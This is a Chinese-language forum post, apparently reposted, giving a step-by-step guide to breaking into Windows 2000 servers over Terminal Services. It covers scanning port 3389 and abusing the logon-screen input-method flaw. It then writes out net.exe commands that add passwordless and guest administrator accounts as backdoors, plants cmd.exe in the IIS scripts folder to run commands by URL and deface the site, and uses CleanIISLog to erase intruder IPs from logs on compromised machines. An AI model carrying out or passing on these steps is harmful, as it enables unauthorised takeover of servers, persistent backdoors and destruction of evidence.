Win2000入侵超详细教程

如何利用终端服务入侵远程计算机 

用过windows 2000终端服务的人一定可以体会到终端服务的方便。但是这也给我们造成了安全风险。恶意用户可以通过猜密码进入系统，更危险的是，如果这台机器存在输入法漏洞的话，那么入侵者可以完全控制这台机器。 
下面我来讲讲如何利用输入法漏洞远程入侵开了终端服务的windows 2000的机器： 

首先我们确定某台机器的3389端口是开放的： 
D:\\Nmapnt"gt;nmapNT.exe -sS -p 3389 xxx.xxx.xxx.xxx 

Starting nmapNT V. 2.53 by ryan@eEye.com 
eEye Digital Security ( 
http://www.eeye.com 
/ ) 
based on nmap by fyodor@insecure.org ( 
www.insecure.org/nmap 
/ ) 
Interesting ports on FGF-DELL4300 (xxx.xxx.xxx.xxx): 
Port State Service 
Nmap run completed -- 255 IP addresses (93 hosts up) scanned in 542 seconds 

D:\TOOLS\nmapNT\Nmapnt"gt; 

现在我们已经可以看到这台机器的终端服务是开放的，那么我们就可以开始行动了。 
打开终端服务客户端，添上IP地址，选择连接。

稍等片刻，一般是很快的，就会出现熟悉的登陆对话框了，这是我们看看有没有输入法的漏洞。有关输入法的漏洞请参看相关文章。如果有输入法漏洞那么我们如何取得控制权呢？经过多次的研究试验。 终于想出了一个办法。我们发现在跳至url后，我们双击winnt目录下的explorer.exe并没什么反应（是机上已经运行了，可是我们为什么看不到结果呢？），如果我们不断的进行双击，或者什么也不做，一会儿连接将被断开，在断开的一霎那，我们似乎看到了我们双击出来的窗口。经过几次试验，我们发现不登陆进去是不行的，将会被服务端断开。于是想办法先登陆进去，我想到了在帮助中打开用户管理器，经过试验，在跳至url中添入：mk:@MSITStore:C:\WINNT\Help\TSHOOTconcepts.chm::/where_usermgr.htm 在右侧会出现一个可以打开本地用户和组的管理器的链接，本来在正常情况下是可以打开这个管理器的， 可是在没有登陆进去的时候就是出不来，于是想另外的办法。终于想到了建立一个命令行的快捷方式。在跳至url中输入：c:\winnt\system32，然后找到net.exe，右键点击net.exe，选择创建快捷方式，于是创建了一个文件名为快捷方式net.lnk的文件，然后再右键点击这个快捷方式，选择属性，这时我们就可以输入我们的命令了。在目标中添入我们要执行的命令的路径和参数就行了，我们还是用net命令，因此不必改路径了，添加个账号test的命令如下，C:\WINNT\system32\net.exe user test/add。密码为空。然后双击这个快捷方式运行它。然后我们把这个账号添加到administrators组中，C:\WINNT\system32\net.exe localgroup administrators test/add。OK!再运行。我们现在已经基本上成功了， 关掉帮助窗口，用test账号登陆，密码为空。进去后我们把刚才建的快捷方式删掉。然后再将本地用户的TSinternetuser账号加进administrators组中，设置密码。这样我们下次就可以用这个账号进来了。然后再用这个账号登陆一下，如果能够登陆，就删掉刚刚建立的test账号。 

这台机器就这样控制在我们的手里了。。。。。。 


输入法漏洞之完全心得及问题 

由于微软对中国产品不付责任的态度，使得安装了终端服务和全拼（^^我只在全拼下成功）的w2k 服务器存在着远程登陆并能获取超级用户权限的严重漏洞。 
小女子几经周折、胆战心惊 、多次尝试 ，终于明白个中道理，不需上传任何文件成功入侵并装个后门（现在流行走后门^^）。 
其过程如下： 

net user guest /active:yes 
net user guest elise 
net localgroup administrators /add guest 

windows2000的终端服务程序是以图开界面远程访问主机的3389端口，而微软的windows2000的输入法漏洞打了补丁后还是存在很多这样那样的遗漏。下面以实例加以说明远程入侵一台主机。 
　 1、用端口扫瞄程序扫IP的3389端口，得到xx.xx.xx.xx。 

　 2、运行windows2000终端客户程序，在服务器输入框里填入：xx.xx.xx.xx ，连接。 

　 3、出现windows2000的登陆窗口，按下CTRL SHIFT键，出现全拼输入法。 

　 4、在输入法状态条上按mouse右键，选择帮助，选择输入指南，选择"quot;选项"quot;按右键。 

　 5、选择"quot;跳转到URL"quot;，输入：c:\winnt\system32\cmd.exe. 

　 6、选择"quot;保存到磁盘"quot;。 

　 7、选择目录：c:\inetpub\scripts\ 

　 8、打开IE，输入：xx.xx.xx.xx/scripts/cmd.exe?/c dir c:\ （知道了吧） 

　 9、输入：xx.xx.xx.xx/scripts/cmd.exe?/c echo BEIJING "gt;c:\inetpub\wwwroot\default.asp 

　 这是一个简单的例子，同志们可别用来对付国内的站点，因为这样的漏洞实在太多。 

这个也是我转来得 呵呵上面讲的很详细了 好好看呀 第一个很实际可行的 呵呵 
呵呵 3389 我的最爱 要是漏洞都想这个这么好找好用就好了 
下面是什么 呢？ 呵呵就 SQL 
我建议大家看 流光的帮助 SQL使用说明 上面太详细了 要不我怎么说流光好呢 帮助都那样的傻瓜, 还有就是关于IIS5.0 的益出 这个呀 还是看帮助对了小榕网站的说明比自带的帮助还要好理解:P 在别处还有别的IIS5.0益出的程序大家可以好好看看 呵呵用中英文的还有日语什么的都全了 原理差不多 

小榕新出的 嗅探器很不错的呵呵 没事可以试试的呵呵 
对了安全第一呀 呵呵 
小榕早给我们准备好了 就是哪个可以删除指定ip的 程序 可以该名用的 
CleanIISLog ReadMe 
CleanIISLog是一个清除IIS LOG记录的工具，和其他工具相比有以下不同点： 
用法: CleanIISLog "lt;LogFile"gt;|"lt;."gt; "lt;CleanIP"gt;|"lt;."gt; 
"lt;LogFile"gt;: 指定要处理的日志文件，如果指定为“.”，则处理所有的日志文件 
（注意：处理所有日志文件需要很长的时间）。 
"lt;CleanIP"gt;: 指定要清除的IP记录，如果指定为“.”，则清除所有的IP记录（不 
推荐这样做）。 
CleanIISLog只能在本地运行，而且必须具有Administrators权限。 
比如把CleanIISLog该名成 MDJY 
命令就 mdjy . **.**.**.** 
呵呵 当然是要是在肉鸡上运行呀 呵呵还必须是Administrators权限, 其实这些都是皮毛 很多的还是要我门自己活学活用的, 上面有很多的错字和没有标点的地方还请大家见量呵呵 ！！！！！

上一页  [1] [2] [3] [4]